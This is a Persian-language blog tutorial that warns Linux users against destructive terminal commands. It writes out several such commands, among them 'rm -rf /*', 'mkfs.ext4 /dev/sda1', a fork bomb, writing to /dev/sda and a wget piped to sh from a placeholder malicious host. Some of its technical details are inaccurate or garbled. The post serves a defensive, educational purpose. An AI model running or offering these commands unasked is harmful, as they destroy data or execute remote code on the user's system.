آموزشلینوکس

دستورات مخرب در محیط ترمینال لینوکس

دستورات مخرب در ترمینال لینوکس

بعد از معرفی کدهای مخرب محیط cmd ویندوز، جا داره که دستورات مخرب در محیط ترمینال لینوکس رو هم براتون معرفی کنیم. همه ما اکثرا دستورات ترمینال رو بدون اینکه بررسی کنیم اجرا میکنیم که این کار خیلی خطرناکی هست. البته اکثر کامند ها بی خطر هستند. کامند هایی که هرگز نباید اجرا شوند عبارتند از:

حذف تمامی فایل های درایو سیستم عامل

sudo rm -rf /*

این دستور با عملکرد واقعا آسان به عنوان یکـی از مخرب ترین دستورات لینوکس شناخته شده و باعث پاک اجباری(rm) همـه فایل ها و پوشه های قابل بازگشت (-rf) در دایرکتوری روت (/) سیستم لینوکس شما می شود . زمانـی که همـه فایل های موجود در دایرکتوری روت پاک شود، هیچ راهی وجود ندارد که شما بتوانید سیستم لینوکس خود را مرتبه دیگر بوت نمایید

فرمت هارد درایو سیستم

sudo mkfs.ext4 /dev/sda1

با اجرای دستور بالا در واقع یک فاجعه ای رخ میدهد که کل هارد شما را فرمت می کند و آن را با فایل سیستمی ext3 تازه جایگزین می کند . زمانـی که دستور اجرا شود، همـه اطلاعات شما بطور غیر قابل بازگشت از میـان می رود. پس هیچوقت این دستور و یا هر دستور مشکوک دیگر که حاوی هارد (SDA) باشد را اجرا ننمایید .

انتقال پوشه Home به dev null

sudo mv‍‍ ~ /dev/null

با اجرا کردن دستور بالا تمامی پوشه Home به dev/null انتقال پیدا می‌کند، در سیستم های پایه یونیکس /dev/null سخت افزاری برای ذخیره سازی است که وجود خارجی یا به سیاه چاله معروف است! و با انتقال فایل به این مسیر تمامی اطلاعات (به اصطلاح) به ناکجا آباد می‌روند و پاک می‌شوند.

دستورات زیر نیز شامل دستورات مخرب هستند :

  • دستور () {: |: &} ;:
  • دستور command > dev / sda
  • دستور wget http: // malicious_source –O | sh
  • دستور > File
  • دستور ^foo^bar
  • در فایل های فشرده Decompression Bomb

بهره گیری از خط فرمان خیلی جذاب و پرکاربرد می باشد اما نباید همـه کامندهایی که از اینترنت پیدا شده را ، کورکورانه اجرا کرد. یک دستور ساده کافی است تا کل سیستم شما را نابود کند. پس همیشه دقت کنید فقط دستورات عرضه شده توسـط سایت های معتبر و قابل اعتماد را اجرا نمایید . برترین راه این می باشد که خودتان پیش از انجام دستور دربـاره عملکرد هر دستور و آثار آن پژوهش نمایید.

یوسف وفایی

فارغ التحصیل کارشناسی IT، علاقه مند به برنامه نویسی و علم امنیت، عاشق یادگیری حرفه های جدید، کنجکاو برای همه چیز، همچنین همیشه تلاش میکنم تا به هدفم برسم...

دیدگاهتان را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *


دکمه بازگشت به بالا